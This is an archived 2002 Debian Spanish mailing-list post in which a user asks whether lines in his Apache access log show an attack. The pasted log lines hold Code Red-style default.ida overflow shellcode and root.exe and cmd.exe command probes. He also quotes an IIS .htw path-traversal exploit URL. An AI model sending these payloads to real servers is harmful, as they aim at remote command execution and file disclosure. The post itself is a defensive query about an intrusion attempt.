[Posible OT]Mas apache

To: debian-user-spanish@lists.debian.org
Subject: [Posible OT]Mas apache
From: Aitor <aitormo@supercable.es>
Date: Fri, 10 May 2002 17:11:26 +0200
Message-id: <[🔎] 200205101506.g4AF66s17679@smtp.supercable.es>

Hola a todos: 
Tengo el apache 1.3.24 instalado desde hace poco (para probarlo) y ayer 
mirando el acces.log me encontre con esto:
218.25.47.223 - - [09/May/2002:01:31:06 +0200] "GET 
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%uc
bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 
400 331 "-" "-"

y con esto:

217.216.124.199 - - [09/May/2002:15:26:26 +0200] "GET 
/scripts/root.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
217.216.124.199 - - [09/May/2002:15:26:29 +0200] "GET /MSADC/root.exe?/c+dir 
HTTP/1.0" 404 287 "-" "-"
217.216.124.199 - - [09/May/2002:15:26:36 +0200] "GET 
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"

Buscando exploits y eso me encontre con este (aunque solo es de IIS):

http://ip/default.asp%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htw?CiwebhitsFile=/../..
/./..test.txt&CiRestriction=none&CiHiliteType=Full

Que mas o menos se parece la pregunta es: ¿Alguien esta intentado algo 
raro?¿o es mejor que deje las bebidas de alta graduacion:-)?
Si alguien me pudiera aclarar esto ya digo que tengo el server desde hace 
poco y lo puse para probar

Gracias y perdonad por el posible [OT] y por lo largo del texto :-)
-- 
____________________________________
*         				              *
*   web personal: http://go.to/nuestra.web     *
*   Linux user #255925			  *
*   Debian/GNU			              *
*    Kernel 2.2.18			              *
*___________________________________*


-- 
To UNSUBSCRIBE, email to debian-user-spanish-request@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org

Reply to:

Follow-Ups:
- Re: [Posible OT]Mas apache
  - From: Roberto Castellor Morant <borzung@softhome.net>

Prev by Date: Re: Mount
Next by Date: Re: [Posible OT]Mas apache
Previous by thread: Re: Paquete rebelde
Next by thread: Re: [Posible OT]Mas apache
Index(es):
- Date
- Thread